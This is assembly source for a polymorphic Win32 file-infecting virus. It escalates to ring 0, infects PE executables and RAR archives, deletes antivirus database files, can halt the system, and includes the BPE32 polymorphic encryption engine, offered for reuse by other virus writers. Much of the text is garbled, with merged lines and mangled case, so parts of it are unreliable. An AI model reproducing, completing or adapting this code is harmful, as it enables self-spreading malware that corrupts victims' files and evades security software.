D_test: MOV Word PTR [EBP VXDCALL_HOOK - TGDELTA], 0EBH ((Farjmp-vxdcall_hook-2) SHL 8)
JMP T_END; Construct JMP to End
E_TEST: MOV WORD PTR [EBP VXDCALL_HOOK - TGDELTA], 0E860H
JMP T_END; Recontruct Original Bytes
g_test: MOV EDX, [EBP SLEEP_T - TGDELTA]; GET SLEEP TIME
Mov [EBX.BGCB_DATA], EDX; Store IT IN BGCB DATA
JMP T_END
Si_test: Mov Edx, [EBX.BGCB_DATA]; GET Increment
Add [EBP SLEEP_T - TGDELTA], EDX; Add It To Sleep Time
JMP T_END
SD_TEST: MOV EDX, [EBX.BGCB_DATA]; GET DECREMENT
SUB [EBP SLEEP_T - TGDELTA], EDX; Substract Sleep Time with IT
JMP T_END
K_test: CLI; Halt System
_HLT_: JMP _HLT_
DS_TEST: STI; Allow INTS
Push 0; Decommit PagePush 1
Push EBX
Push 00010002H
Call [EBP VXDCALL0 - TGDELTA]
Free_pg: Push 0; Free Page
Push EBX
Push 0001000AH
Call [EBP VXDCALL0 - TGDELTA]
Push -1; Sleep Thread for EVER
Sleep: Push 002A0009H; Service Sleep
Call [EBP VXDCALL0 - TGDELTA]; CALL IT
Popad; Restore All Regs
Ret; return
T_Sleep: Pushhad; Save All Regs
Push 1000; One Second Long Sleep Time
SLEEP_T = DWORD PTR $ - 4
JMP SLEEP; SLEEP
Thread Endp; Thread Ends Here
Infect: MOV ESI, EDX; ESI = EDI
Infct2: MOV BYTE PTR [EBP SEMAPHORE - MGDELTA], 0; SET SEMAPHORE
MOV Word PTR [EBP IPATCH - MGDELTA], 9090H; Patch INT21H
XOR ECX, ECX; ECX = 0
MOV CL, 1; CL = R0_PATCH
R0_PATCH = BYTE PTR $ - 1; Ring0 Procedure IS Called
Jecxz Leavering0; ONLY ONCE
Call Enterring0; Enterring0
Push 0; now WE WILL CREATE NEW
Lea Edx, [EBP CALLBACK - MGDELTA]; VMM THREAD
Push EDX; Callback Function
Push 'TA92'; Thread Type
PUSH ESI; ES
PUSH ECX; DS
Lea EDX, [EBP Thread - Mgdelta]; EIP
Push edx; ...
PUSH EBX; CS
Lea EDX, [EBP Threadstack - Mgdelta]; ESP
Push edx; ...
Push EDI; SS
INT 20H; VMMCall
DD 00010105H; VMMCREATTHREAD
SUB ESP, -24H; Correct Stack
MOV BYTE PTR [EBP R0_PATCH - MGDELTA], 0; PATCH
IRETD; RETURN FROM INT
Leavering0:
Call Check_name; Check FileName
Modify ON Your Own Risc!
JC EXIT_INFECTION; Error?
JMP EXIT_INFECTION
MOV [EBP TMPEXT - MGDELTA], EAX; Save Extension
MOV Eax, 7143h; LFN Retrieve
XOR EBX, EBX; Attributes
Call Int21H
JC EXIT_INFECTION
MOV [EBP File_attr - Mgdelta], ECX; Save Them
MOV Eax, 7143h; LFN Set Attributes
Inc EBX
XOR ECX, ECX
Call Int21h; set them
JC EXIT_INFECTION
MOV EAX, 7143H; LFN Retrieve Time / DateInc EBX
Inc EBX
Inc EBX
Call Int21H
JC EXIT_INFECTION
MOV [EBP File_Time - Mgdelta], ECX; Save IT
MOV [EBP File_Date - Mgdelta], EDI
MOV Eax, 716CH; LFN Extended Create /
Mov ESI, EDX; / OPEN FILE
Dec EBX
Dec EBX
XOR ECX, ECX; ECX = 0
CDQ; EDX = 0
Inc EDX; EDX = 1
Call Int21H; Open File for r / w
JC EXIT_INFECTION
XCHG EBX, EAX
MOV Eax, 12345678; Get Extension
TMPEXT = DWORD PTR $ - 4
CMP AH, 'R'; Is IT ".rar"?
JE TRY_RAR; YEAH, Infect Rar
; NOW WE WILL TEST for Pentium Processor
Pushad; save all regs
Pushfd; save eflags
POP EAX; Get Them
Mov ECX, EAX; Save them
OR EAX, 200000H; Flip ID Bit in EFLAGS
Push Eax; Store
POPFD; Flags
Pushfd; Get Them Back
POP EAX; ...
XOR EAX, ECX; Same?
JE END_CC; Shit, WE R on 486-
XOR Eax, Eax; EAX = 0
Inc EAX; EAX = 1
CPUID; cpuid
And Eax, 111100000000B; Mask Processor Family
CMP AH, 4; Is IT 486?
JE end_cc; baraaaaad
Popad; NO, Pentium Installed
MOV BYTE PTR [EBP V_STATE - MGDELTA], BG_INFECTINEXEC; SET STATE
Push image_sizeof_dos_header; Mz Header
POP ECX
Call read_something; ie
JC Close_file
CMP Word PTR [EBP HEADER - MGDELTA], Image_DOS_SIGNATURE
JNE CLOSE_FILE; Is IT Really MZ Header?
CMP Word PTR [EBP Header.mz_res2 - Mgdelta], 29ah
BG_SIG = Word PTR $ - 2; ALREADY INFECTED?
JE close_file
Call seek_eof; Get File Size
JC Close_file
MOV [EBP FSIZE - MGDELTA], EAX; Save IT
CMP Eax, 1000h; Is IT Smaller Than
JB close_file; 4096 bytes?
Mov EDX, 400000H
CMP EDX, EAX; TOO LARGE?
JB Close_File
MOV EDX, [EBP Header.mz_Lfanew - Mgdelta]; Get Ptr To PE Header
Mov [EBP MZLFANEW - MGDELTA], EDX; SAVE IT
XCHG EAX, EDXCMP EAX, EDX; Points INSIDE FILE?
JNB Close_File; No, Invalid Ptr
Call seek_here; seek to mz_lfanew
MOV ECX, 4 image_sizeof_file_header image_sizeof_nt_optional_header
Call read_something; read while peepeer
JC Close_file
CMP DWORD PTR [EBP HEADER - MGDELTA], Image_NT_SIGNATURE
JNE CLOSE_FILE; IS IT PE / 0/0?
CMP Word PTR [EBP Header.nt_fileHeader.fh_Machine - Mgdelta], /
Image_file_machine_i386; Must i386 Compatible
JNE CLOSE_FILE
Mov Eax, [EBP Header.nt_fileHeader.fh_Characteristics - Mgdelta]
Not al
TEST AX, Image_FILE_EXECUTABLE_IMAGE OR Image_FILE_DLL
JNE Close_File; Must Be Exec, MustNT Be DLL
CMP [EBP Header.nt_OptionalHeader.oh_ImageBase - Mgdelta], 400000H
JNE Close_File; Must BE 400000H
Movzx ESI, Word PTR [EBP Header.nt_FileHeader.fh_sizeOfoptionalhead - Mgdelta]
Movzx EDX, Word Ptr [EBP Header.nt_fileHeader.fh_Numberofsections - Mgdelta]
Dec edx
Imul edx, image_sizeof_section_header; ptr to last section
Mov Eax, 12345678H
MzLFanew = DWORD PTR $ - 4
SUB EAX, -IMAGE_SIZEOF_FILE_HEADER-4
Add Eax, ESI
Add Eax, EDX
MOV [EBP SH_POS - MGDELTA], EAX
Call seek_here; seek to last section header
Push image_sizeof_section_header
POP ECX
Lea Edx, [EBP Section_Header - Mgdelta]
Call R_Something; Read Last Section HEADER
JC Close_file
MOV EAX, Virtual_END-START; SIZE OF File in Memory
Mov ESI, [EBP Section_Header.sh_sizeofrawdata - mgdelta]
Lea Edx, [EBP Section_Header.sh_virtualsize - mgdelta]
Add [EDX], EAX; New Virtualsize, Set Write Bit
Or byte PTR [EBP Section_Header.sh_characteristics.hiw.hib - mgdelta], 0C0H
Add Eax, [EDX]; Now We will align Some Items
MOV ECX, [EBP Header.nt_OptionalHeader.oh_FileAlignment - Mgdelta] CDQ; In Pe Header
Div ECX
INC EAX
Mul ECX
Add [EBP Section_Header.sh_sizeofrawData - Mgdelta], EAX
Sub Eax, ESI; New SizeOfrawData
MOV [EBP Header.nt_OptionalHeader.OH_SizeOfImage - Mgdelta], EAX
New SizeOfImage
Mov Eax, 12345678H; Ptr to Last Section Header
SH_POS = DWORD PTR $ - 4
Call seek_here; seek there
Push image_sizeof_section_header; Write Modified Section
POP ECX; Header
Lea Edx, [EBP Section_Header - Mgdelta]
Call write_something; ...
Call seek_here; seek to mz_res2
Push 2; and write there
POP ECX; Already Infected
Lea EDX, [EBP BG_SIG - MGDELTA]; MARK
Call write_something; ...
Push 4; Write there Original
POP ECX; EntryPoint Also
Lea Edx, [EBP Header.nt_OptionalHeader.OH_AddressofentryPoint - Mgdelta]
Call write_something; ...
Mov Eax, [EBP MZLFANEW - MGDELTA]; Seek to PE Header
Call seek_here
Mov Eax, 12345678H; Get File Size
fsize = dword ptr $ - 4
Add Eax, [EBP Section_Header.sh_virtualAddress - Mgdelta]
Sub Eax, [EBP Section_Header.sh_pointertorawdata - mgdelta]
MOV [EBP Header.nt_OptionAlHeader.oh_addressofentrypoint - Mgdelta], EAX
Modify EntryPoint
Push image_sizeof_file_header 4 5EH
POP ECX
Lea Edx, [EBP HEADER - MGDELTA]
Call write_something; Write Modified Pe Header
Call seek_eof; seek to end of file
Lea EDI, [EBP CRYPTED_VIRUS - MGDELTA]; Address of Encrypted Virus
XOR ECX, ECX; ECX = 0
MOV CL, 1; CL = f_Poly
F_POLY = BYTE PTR $ - 1; POLY-ENGINE RAN ONCE?
JECXZ End_Poly; Yeah, Copy Virus ONLY
Mov ESI, 12345678H; Get Start of Virus in Memory
MEM_ADDR = DWORD PTR $ - 4
MOV ECX, 6C0H; APROXIMATED SIZE OF Viruscall BPE32
MOV BYTE PTR [EBP F_POLY - MGDELTA], 0; SET POLY SEMAPHORE
MOV BYTE PTR [EBP DO_RAR - MGDELTA], 1; Enable Rar Infection
End_poly:
Mov ECX, 2000H; 8192 BYTES
MOV EDX, EDI; WHERE?
Call write_something; Write 8192 bytes of Virus
JMP close_file; to file and quit
END_CC: POPAD; Restore All Registers
Close_file:
Mov Ah, 3EH; Close File
Call Int21h; ...
MOV Eax, 7143h; LFN Set File Time / Date
Push 3
POP EBX
Lea Edx, [EBP TARGETNAME - MGDELTA]
MOV ECX, 12345678H; Original Time
FILE_TIME = DWORD PTR $ - 4
MOV EDI, 12345678H; Original Date
FILE_DATE = DWORD PTR $ - 4
Call Int21h; Set IT Back
MOV Eax, 7143h; LFN SET File Attributes
Dec EBX
Dec EBX
MOV ECX, 12345678H; Original File Attributes
FILE_ATTR = DWORD PTR $ - 4
Call Int21h; Set IT Back
Now WE Will Delete Some Av Databases
Lea ESI, [EBP SHITTYFILEZ - MGDELTA]; Start of File Names
Push 5; Number of them
POP ECX
Delit: push ecx; save count
Mov EDX, ESI
Mov Eax, 4301h; Set File Attributes
XOR ECX, ECX; Blank Them
Call Int21h; ...
MOV AH, 41H; And Delete File
Call Int21h; ...
POP ECX; Restore Count
END_SZ: LODSB; Get
Test Al, Al; End of Of
JNE END_SZ; STRING
Loop Delit; delete files in a loop
JMP EXIT_INFECTION; and EXIT
TRY_RAR:
MOV BYTE PTR [EBP V_STATE - MGDELTA], BG_INFECTINRAR; SET V_STATE
XOR ECX, ECX; ECX = 0
MOV CL, 0; CL = do_rar
Do_rar = byte PTR $ - 1; Before Infectin Rar Weme
JECXZ Close_File; Infect At Least One Exe
; To Initialize Poly
Now WE WILL CHECK, IF Last File in Rar Has Our Name. if Has, Rar IS Already
Infected and we wont infect it again.
Call seek_eof; go to the end of file
JC Close_file
Add Eax, -3000H-8; Go to the EOF-3000H-8Call seek_here; ...
JC Close_file
Lea Edx, [EBP TMPNAME - MGDELTA]; Read 8 Bytes from That
Push 8; Location to TempoRoyal Buffer
POP ECX; ...
Call r_something; ...
JC Close_file
Push 2; Compare 8 Bytes of FileName
POP ECX
MOV ESI, EDX
Lea EDI, [EBP RARNAME - MGDELTA]
n_cmp2: cmpsd
JNE INF_RAR; NOT MATCH, WE CAN Infect IT
Loop n_cmp2
JMP close_file; rar already infected, quit
INF_RAR: CALL SEEK_EOF; Got To The End of File
Lea ESI, [EBP D1START - MGDELTA]; GET START OF Dropper Part 1
Lea EDI, [EBP VIRUS_IN_ARC - MGDELTA]; Destination
Push EDI; Save it for L8R USE
MOV ECX, D1Size; How Many Bytes
Rep Movsb; Copy Dropper Part 1
Lea ESI, [EBP CRYPTED_VIRUS - MGDELTA]; Get Start of Encrypted Virus
Mov ECX, 2000H; 8192 BYTES
Rep Movsb; COPY Virus
Lea ESI, [EBP D2START - MGDELTA]; GET START OF Dropper PART 2
Mov ECX, D2SIZE; How Many Bytes
Rep Movsb; Copy Dropper Part 2
POP ESI; GET Address of Dropper
MOV EDI, 3000H; Size of Dropper
Call CRC32; Calculate CRC32
MOV [EBP RARCRC32 - MGDELTA], EAX; Save IT
Lea ESI, [EBP RARHEADERCRC 2 - Mgdelta]; Start of Rar Header
MOV EDI, END_RAR-RARHEADER-2; SIZE
Call CRC32; Calculate CRC32 of HEADER
MOV [EBP RARHEADERCRC - MgDelta], AX; Save IT
MOV ECX, END_RAR-RARHEADER; SIZE OF RAR HEADER
Lea Edx, [EBP RARHEADER - MGDELTA]; Start of Rar Header
Call write_something; Write Rar Header To File
MOV ECX, 3000H; Dropper Size
Lea Edx, [EBP VIRUS_IN_ARC - MGDELTA]; START OF DROPPER
Call write_something; Write Dropper to File
JMP close_file; and close file
C_name: Push Edi; Save EDI
Lea EDI, [EBP TARGETNAME - SGDELTA]; Address of FileName
JMP CNAMECHECK_NAME:
Push Edi; Save EDI
Lea EDI, [EBP TARGETNAME - MGDELTA]; Address of FileName
CNAME: MOV EDX, EDI; ...
Mov ECX, Max_Path; Size of FileName
CLD
N_LOOP: LODSB; LOAD BYTE
CMP AL, 'A'; Is IT Big Letter?
JB NLOWER; YEAH
CMP AL, 'Z'; Is IT Letter?
Ja Nlower; no
Add Al, 'A' - 'A'; UPPER Letter
NLower: Stosb; Save Letter
TEST Al, Al; Is IT end?
JE E_NAME; YEAH
CMP Al, '/'; IS IT Backslash
JNE NLOOP; NO
NLOOP: loop n_loop; Upper Letters in loop
I_Name: POP EDI; Restore Edi
STC; SET ERROR FLAG
Ret; and return
E_NAME: MOV Eax, [EDI-5]; Get Extension
CMP Eax, 'EXE.'; IS it .exe
JE N_NAME
CMP EAX, 'RCS.'; is it .scr
JE N_NAME
CMP EAX, 'RAR.'; is it .rar
JE N_NAME
CMP EAX, 'XFS.'; is it .sfx
JE N_NAME
CMP EAX, 'LPC.'; is it .cpl
JE N_NAME
CMP EAX, 'Kab.'; is it .bak
JE N_NAME
CMP EAX, 'Tad.'; is it .dat
JNE I_NAME
n_name: POP EDI; Restore EDI
Callback:
CLC; Clear Error Flag
Ret; and return
Seek_here:; Seek to EAX
MOV ECX, EAX; ECX = EAX
SHR ECX, 16; CX = MSW of EAX
Movzx EDX, AX; DX = LSW of Eax
XOR Eax, Eax; EAX = 0
JMP seek; seek
Seek_eof:
MOV Al, 02H; Al = 2H
CDQ; EDX = 0
XOR ECX, ECX; ECX = 0
Seek: MOV AH, 42H; AH = 42H
Call Int21h; seek
JC Q_Seek; Error?
Movzx Eax, AX; EAX = LSW of Eax
SHL EDX, 16
OR EAX, EDX; EAX = LSW of Eax & MSW of EDX
CDQ; EDX = 0
CLC; Clear Error Flag
Q_Seek: Ret; Return
CRC32: Push Ebx; i Found this code in int13h's
XOR ECX, ECX; Tutorial About Infectin '
Dec Ecx; Archives. INT13H Found this
Mov EDX, ECX; Code in Vecna's INCA VIRUS.
Nextbytecrc:; So, Thank Ya Guys ...
XOR EAX, EAX; EBX, EBX; Procedure To CODE CRC32 AT
Lodsb; Runtime, No Need to Use Big
xor al, cl; tables.
MOV CL, CH
MOV CH, DL
MOV DL, DH
MOV DH, 8
NextbitCrc:
SHR BX, 1
RCR AX, 1
JNC NOCRC
XOR AX, 08320H
XOR bx, 0edb8h
NOCRC: DEC DH
JNZ nextbitCrc
XOR ECX, EAX
XOR EDX, EBX
Dec Edi
JNE NEXTBYTECRC
Not Edx
NOT ECX
POP EBX
MOV EAX, EDX
ROL EAX, 16
MOV AX, CX
RET
; BPE32 (Benny's Polymorph Engine for Win32) Starts Here. U CAN FIND FIRST
Version of BPE32 IN DDT # 1 E-Zine. But Unfortunately, How IT Usualy Goes,
There WERE TWO, Really Silly / Tiny Bugs. i Found Them and Corrected Them. So,
; if u wanna us BPE32 in Your Code, Use this Version, Not That Version from
DDT # 1. Very Big Sorry To Everyone, WHO HAD / HAS / WILL HAVE Problems with it.
BPE32 PROC
Pushad; save all regs
Push EDI; Save these Regs for L8R USE
Push ECX; ...
Mov Edx, EDI; ...
Push ESI; Preserve this REG
Call Rjunk; Generate Random Junk Instructions
POP ESI; Restore IT
MOV Al, 0e8h; Create Call Instruction
Stosb; ...
Mov Eax, ECX; ...
Imul Eax, 4; ...
Stosd; ...
Mov Eax, EDX; Calculate Size of Call Junx
Sub EDX, EDI; ...
NEG EDX; ...
Add Edx, Eax; ...
Push EDX; Save IT
Push 0; Get Random Number
Call Random; ...
XCHG EDX, EAX
MOV [EBP XOR_KEY - MGDELTA], EDX; Use it as xor constant
Push 0; Get Random Number
Call Random; ...
XCHG EBX, EAX
MOV [EBP Key_inc - Mgdelta], EBX; Use IT As Key Increment Constant
X_Loop: Lodsd; Load Dword
XOR EAX, EDX; Encrypt IT
StOSD; Store Encrypted DWORD
Add Edx, EBX; Increment Key
Loop X_Loop; Next DWORD
Call Rjunk; Generate Junx
Mov Eax, 0006E860H; Generate SEH HANDLER
Stosd; ...
MOV EAX, 648B0000H; ...
STOSD; ... MOV Eax, 0CEB0824H; ...
Stosd; ...
Greg0: Call Get_reg; Get Random Register
CMP Al, 5; Must Not Be EBP REGOSTER
Je Greg0
MOV BL, Al; Store Register
MOV DL, 11; Proc Parameter (Do Not Generate MOV)
Call make_xor; Create Xor or subintruction
Inc EDX; Destroy Parameter
MOV Al, 64h; Generate FS:
StoSB; Store IT
Mov Eax, 896430ffh; Next SEH INSTRUCTIONS
OR AH, BL; Change Register
StOSD; store them
MOV Al, 20H; ...
Add Al, BL; ...
Stosb; ...
Push 2; Get Random Number
Call Random
Test Eax, EAX
JE _BYTE_
MOV Al, 0FEH; Generate Inc DWORD PTR
JMP _DW_
_BYTE_: MOV AL, 0FFH; Generate Inc Byte PTR
_DW_: Stosb; Store IT
Mov Al, BL; Store Register
Stosb; ...
MOV Al, 0ebh; Generate Jump Short
Stosb; ...
MOV Al, -24D; Generate Jump to Start of Code (Trick
Stosb; for better emulators, e.g. nodice32)
Call Rjunk; Generate Junx
Greg1: Call Get_reg; Generate Random Register
CMP Al, 5; Must Not Be EBP
Je Greg1
MOV BL, Al; Store IT
Call make_xor; generate xor, subs reg, reg or mov reg, 0
MOV Al, 64H; Next SEH INSTRUCTIONS
Stosb; ...
MOV Al, 8FH; ...
Stosb; ...
MOV Al, BL; ...
Stosb; ...
MOV Al, 58h; ...
Add Al, BL; ...
Stosb; ...
Mov al, 0e8h; Generate Call
Stosb; ...
XOR EAX, Eax; ...
Stosd; ...
Push EDI; Store for L8R USE
Call Rjunk; Call Junk Generator
Call get_reg; random register
MOV BL, Al; Store IT
Push 1; Random Number (0-1)
Call Random; ...
Test Eax, EAX
JNE NEXT_DELTA
MOV Al, 8bh; Generate Mov REG, [ESP]; POP EAX
Stosb
MOV Al, 80h
OR Al, BL
ROL Al, 3
Stosb
MOV Al, 24h
Stosb
MOV Al, 58H
JMP BDELTA
Next_delta:
MOV Al, BL; Generate Pop Reg; Sub Reg, ...
SUB Al, -58H
BDELTA: Stosb
MOV Al, 81H
Stosb
Mov al, 0e8h
Add Al, BL
Stosb
POP Eaxstosd
Call Rjunk; Random Junx
XOR BH, BH; Parameter (First Execution Only)
Call Greg2; Generate Mov SourceReg, ...
MOV Al, 3; Generate Add SourceReg, Deltaoffset
Stosb; ...
MOV Al, 18h; ...
OR Al, Bh; ...
ROL Al, 3; ...
OR Al, BL; ...
Stosb; ...
MOV ESI, EBX; Store EBX
Call Greg2; Generate Mov Countreg, ...
Mov CL, BH; Store Count Register
MOV EBX, ESI; Restore EBX
Call Greg3; Generate Mov KeyReg, ...
Push EDI; Store this position for jump to decryptor
MOV Al, 31h; Generate Xor [SourceReg], KeyReg
Stosb; ...
Mov al, ch; ...
ROL Al, 3; ...
OR Al, Bh; ...
Stosb; ...
Push 6; this Stuff Will Choose Ordinary of Calls
Call Random; To Code Generators
Test Eax, EAX
JE G5; GREG4 - Key Incremention
CMP AL, 1; Greg5 - Source Incremention
JE G1; GREG6 - Count Decrement
CMP Al, 2; Greg7 - Decryption Loop
Je g2
CMP Al, 3
Je g3
CMP AL, 4
Je g4
G0: Call GG1
Call greg6
JMP g_end
G1: Call GG2
Call greg5
JMP g_end
G2: Call GREG5
Call GG2
JMP g_end
G3: Call GREG5
GG3: Call GREG6
JMP g_out
G4: Call GREG6
Call GG1
JMP g_end
G5: Call GREG6
Call greg5
g_out: Call Greg4
g_end: Call Greg7
MOV Al, 61h; Generate Popad Instruction
Stosb; ...
Call Rjunk; Junk Instruction Generator
MOV Al, 0C3H; RET INSTRUCTION
Stosb; ...
POP Eax; Calculate Size of Decryptor and Encrypted Data
Sub Eax, EDI; ...
NEG EAX; ...
Mov [ESP.PUSHAD_EAX], EAX; Store It To Eax Register
Popad; Restore All Regs
Ret; and Thats All FOLX
Get_reg proc; this procedure generates random register
Push 8; Random Number (0-7)
Call Random; ...
Test Eax, EAX
JE get_reg; Must Not Be 0 (= EAX IS Used as junk register)
CMP Al, 100B; Must Not Be ESP
JE get_reg
RET
GET_REG ENDP
Make_xor proc; this procedure will generate Instruction, Thatpush 3; Will Nulify Register (BL As Parameter)
Call Random
Test Eax, EAX
JE _SUB_
CMP Al, 1
JE _MOV_
MOV Al, 33h; Generate Xor REG, REG
JMP _xor_
_SUB_: MOV Al, 2Bh; Generate Sub Reg, REG
_xor_: Stosb
MOV Al, 18h
OR Al, BL
ROL Al, 3
OR Al, BL
Stosb
RET
_MOV_: CMP DL, 11; Generate Mov Reg, 0
Je make_xor
MOV Al, 0B8H
Add Al, BL
Stosb
XOR EAX, EAX
Stosd
RET
Make_xor endp
GG1: Call GREG4
JMP GREG5
GG2: Call GREG4
JMP GREG6
Random Proc; This Procedure Will Generate Random Number
; in Range from 0 to pushed_parameter-1
; 0 = do not truncate result
Push EDX; Save Edx
DB 0FH, 31H; RDTCS INSTRUCTION - READS PSS TIX and Stores
Number of Them Into Pair EDX: EAX
XOR EDX, EDX; Nulify Edx, WE NEED INLY EAX
CMP [ESP 8], EDX; is parameter == 0?
Je r_out; yeah, do not truncate result
Div DWORD PTR [ESP 8]; Divide IT
XCHG Eax, EDX; Remainder As Result
R_out: POP EDX; Restore Edx
RET PSHD; Quit Procedure and Destroy Pushed Parameter
Random ENDP
Make_xor2 proc; Create Xor Instruction
MOV Al, 81H
Stosb
MOV Al, 0F0H
Add Al, BH
Stosb
RET
Make_xor2 endp
Greg2 proc; 1 parameter = Source / Count Value
Call get_reg; get register
CMP AL, BL; Already used?
Je Greg2
CMP AL, 5
Je Greg2
CMP Al, BH
Je Greg2
MOV BH, Al
MOV ECX, [ESP 4]; Get Parameter
Push 5; Choose Instructions
Call Random
Test Eax, EAX
JE S_NEXT0
CMP Al, 1
JE S_Next1
CMP AL, 2
JE S_Next2
CMP Al, 3
JE S_NEXT3
MOV Al, 0B8H; MOV REG, RANDOM_VALUE
Add Al, Bh; Xor REG, VALUE
Stosb; param = random_value xor value
PUSH 0
Call Random
XOR ECX, EAX
Stosd
Call make_xor2
MOV EAX, ECX
JMP N_END2
S_Next0: Mov Al, 68H; Push Random_ValuestOSB; POP REG
Push 0; xor REG, VALUE
Call Random; Result = Random_Value Xor Value
XCHG EAX, ECX
XOR EAX, ECX
Stosd
MOV Al, 58H
Add Al, BH
Stosb
Call make_xor2
XCHG EAX, ECX
JMP N_END2
S_Next1: MOV Al, 0B8H; Mov Eax, Random_Value
Stosb; Mov REG, EAX
Push 0; SUB REG, VALUE
Call Random; Result = Random_Value - Value
Stosd
Push EAX
MOV Al, 8BH
Stosb
MOV Al, 18h
OR Al, BH
ROL Al, 3
Stosb
MOV Al, 81H
Stosb
Mov al, 0e8h
Add Al, BH
Stosb
POP EAX
Sub Eax, ECX
JMP N_END2
S_Next2: Push Ebx; xor REG, REG
MOV BL, BH; Xor REG, RANDOM_VALUE
Call make_xor; add reg, value
POP EBX; Result = Random_Value Value
Call make_xor2
PUSH 0
Call Random
SUB ECX, EAX
Stosd
Push ECX
Call S_LBL
POP EAX
JMP N_END2
S_LBL: MOV Al, 81H; Create Add Reg, ... instruction
Stosb
MOV Al, 0C0H
Add Al, BH
Stosb
RET
S_Next3: Push Ebx; xor REG, REG
MOV BL, BH; Add Reg, Random_Value
Call make_xor; xor rag, Value
POP EBX; Result = Random_Value Xor Value
PUSH 0
Call Random
Push EAX
XOR EAX, ECX
XCHG EAX, ECX
Call S_LBL
XCHG EAX, ECX
Stosd
Call make_xor2
POP EAX
N_END2: Stosd
PUSH ESI
Call Rjunk
POP ESI
RET PSHD
GREG2 ENDP
GREG3 PROC
Call get_reg; get register
CMP AL, 5; Already used?
Je greg3
CMP AL, BL
Je greg3
CMP Al, BH
Je greg3
CMP AL, CL
Je greg3
MOV CH, Al
MOV EDX, 12345678H; Get Encryption Key Value
XOR_KEY = DWORD PTR $ - 4
Push 3
Call Random
Test Eax, EAX
JE K_NEXT1
CMP Al, 1
JE K_NEXT2
Push Ebx; xor reg, REG
Mov BL, Ch; OR, Add, Xor REG, VALUE
Call make_xor
POP EBX
MOV Al, 81H
Stosb
Push 3
Call Random
Test Eax, EAX
JE K_NXT2
CMP Al, 1
JE K_NXT3
MOV Al, 0C0H
K_nxt1: Add Al, CH
Stosb
Xchg Eax, edxn_end1: stosd
K_end: Call Rjunk
RET
K_nxt2: MOV Al, 0F0H
JMP K_NXT1
K_nxt3: MOV Al, 0C8H
JMP K_NXT1
K_Next1: MOV Al, 0B8H; Mov Reg, Value
JMP K_NXT1
K_Next2: Mov Al, 68H; Push Value
Stosb; POP REG
XCHG EAX, EDX
Stosd
MOV Al, CH
SUB Al, -58H
JMP i_end1
GREG3 ENDP
Greg4 proc
MOV EDX, 12345678H; Get Key Increment Value
Key_inc = DWORD PT $ - 4
I_Next: Push 3
Call Random
Test Eax, EAX
JE I_NEXT0
CMP Al, 1
JE I_NEXT1
CMP AL, 2
JE I_NEXT2
MOV Al, 90H; XCHG Eax, REG
Add Al, CH; Xor REG, REG
Stosb; Or REG, EAX
Push Ebx; Add Reg, Value
MOV BL, CH
Call make_xor
POP EBX
MOV Al, 0BH
Stosb
MOV Al, 18h
Add Al, CH
ROL Al, 3
Stosb
I_Next0: Mov Al, 81H; Add Reg, Value
Stosb
MOV Al, 0C0H
Add Al, CH
Stosb
XCHG EAX, EDX
JMP N_END1
I_Next1: MOV Al, 0B8H; Mov Eax, Value
Stosb; Add Reg, EAX
XCHG EAX, EDX
Stosd
MOV Al, 3
Stosb
MOV Al, 18h
OR Al, CH
ROL Al, 3
I_END1: Stosb
i_end2: Call Rjunk
RET
I_Next2: Mov Al, 8bh; Mov Eax, Reg
Stosb; Add Eax, Value
MOV Al, 0C0H; XCHG Eax, REG
Add Al, CH
Stosb
MOV Al, 5
Stosb
XCHG EAX, EDX
Stosd
MOV Al, 90h
Add Al, CH
JMP i_end1
GREG4 ENDP
Greg5 proc
Push ECX
MOV CH, BH
Push 4
POP EDX
Push 2
Call Random
Test Eax, EAX
JNE NG5
Call i_next; same as prepvious, value = 4
POP ECX
JMP K_END
NG5: MOV Al, 40H; 4X Inc REG
Add Al, CH
POP ECX
Stosb
Stosb
Stosb
JMP i_end1
GREG5 ENDP
GREG6 PROC
Push 5
Call Random
Test Eax, EAX
JE D_NEXT0
CMP Al, 1
JE D_NEXT1
CMP AL, 2
JE D_NEXT2
MOV Al, 83H; Sub Reg, 1
Stosb
Mov al, 0e8h
Add Al, Cl
Stosb
MOV Al, 1
JMP i_end1
D_Next0: MOV Al, 48H; Dec REG
Add Al, Cl
JMP i_end1
D_Next1: Mov Al, 0B8H; MOV Eax, Random_Value
Stosb; Sub Reg, EAX
Push 0; add reg, random_value-1call random
Mov Edx, EAX
Stosd
MOV Al, 2BH
Stosb
MOV Al, 18h
Add Al, Cl
ROL Al, 3
Stosb
MOV Al, 81H
Stosb
MOV Al, 0C0H
Add Al, Cl
Stosb
Dec edx
MOV EAX, EDX
JMP N_END1
D_Next2: MOV Al, 90H; XCHG Eax, REG
Add Al, Cl; Dec EAX
Stosb; Xchg Eax, REG
MOV Al, 48h
Stosb
MOV Al, 90h
Add Al, Cl
JMP i_end1
GREG6 ENDP
Greg7 Proc
Mov Edx, [ESP 4]
Dec edx
Push 2
Call Random
Test Eax, EAX
JE L_NEXT0
MOV Al, 51H; Push ECX
Stosb; Mov ECX, REG
MOV Al, 8BH; JECXZ Label
Stosb; POP ECX
MOV Al, 0C8H; JMP Decrypt_Loop
Add Al, Cl; Label:
Stosb; POP ECX
Mov eax, 0eb5903e3h
Stosd
Sub EDX, EDI
MOV Al, DL
Stosb
MOV Al, 59H
JMP L_Next
L_next0: Push Ebx; xor EAX, EAX
XOR BL, BL; DEC EAX
Call make_xor; add Eax, REG
POP EBX; JNS Decrypt_LOOP
MOV Al, 48h
Stosb
MOV Al, 3
Stosb
MOV Al, 0C0H
Add Al, Cl
Stosb
MOV Al, 79h
Stosb
Sub EDX, EDI
MOV Al, DL
l_next: Stosb
Call Rjunk
RET PSHD
GREG7 ENDP
Rjunkjc: Push 7
Call Random
JMP RJN
Rjunk Proc; Junk Instruction Generator
Push 8
Call Random; 0 = 5, 1 = 1 2, 2 = 2 1, 3 = 1, 4 = 2, 5 = 3, 6 = None, 7 = Dummy Jump and Call
RJN: Test Eax, EAX
Je j5
CMP Al, 1
JE j_1x2
CMP AL, 2
JE j_2x1
CMP AL, 4
Je J2
CMP AL, 5
Je J3
CMP AL, 6
Je r_end
CMP AL, 7
Je jcj
J1: Call Junx1; One Byte Junk Instruction
NOP
Dec EAX
CMC
INC EAX
CLC
CWDE
STC
CLD
Junx1: POP ESI
Push 8
Call Random
Add ESI, ESI
Movsb
RET
J_1x2: Call J1; One Byte and Two Byte
JMP J2
J_2x1: Call J2; Two Byte and One Byte
JMP J1
J3: Call Junx3
DB 0C1H, 0C0H; ROL Eax, ...
DB 0C1H, 0E0H; SHL EAX, ...
DB 0C1H, 0C8H; Ror Eax, ...
DB 0C1H, 0E8H; SHR EAX, ...
DB 0C1H, 0D0H; RCL EAX, ...
